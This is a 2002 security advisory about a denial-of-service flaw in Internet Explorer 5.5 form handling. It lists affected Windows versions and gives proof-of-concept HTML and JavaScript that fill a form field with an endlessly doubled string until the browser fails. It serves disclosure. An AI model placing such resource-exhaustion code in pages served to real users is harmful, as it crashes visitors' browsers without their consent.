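Microsoft IE forms are subject to a denial-of-service attack

Published: 2002-01-19
Updated: 2002-01-19
Severity: Medium
Threat level: Remote denial of service
Error type: Failure to handle exceptional conditions
Exploitation method: Client mode
BUGTRAQ ID: 3892

Affected systems

Microsoft Internet Explorer 5.5SP2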
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Terminal Server 4.0
Microsoft Internet Explorer 5.5SP1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.5
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
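- Microsoft Windows NT 4.0SP6a

Detailed description

IE suffers a denial of service when processing an overly long POST and when processing large amounts of data in <INPUT... > and <TEXTAREA> fields.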

Test code

-- begin test.html --
<html><title></title>
<body>
<script language="JavaScript" src="t.js"></script>
<FORM NAME="IEDos" METHOD="POST" ACTION="./">
<IMG SRC="1.gif" width='10' height='10' border='0'
onLoad="FillTA(TA)">
<input type="text" name="TA" value="">
</FORM>
</body>
</html>
-- end test.html --
-- begin t.js --
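<!--
// Called from the IMG onLoad handler in test.html with the form's text field.
function FillTA(obj) {
v="a";
// v doubles in length on every pass of the loop.
for(i=0;i<100000000;i++) {
v=v+v;
};
// The resulting string is assigned to the form field.
obj.value=v;
return;
}
//-->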
-- end t.js --

Solution

None yet.

Related information

Ivan Sergio Borgonovo <mail@gorilla.it>
Reference: http://www.securityfocus.com/archive/1/250592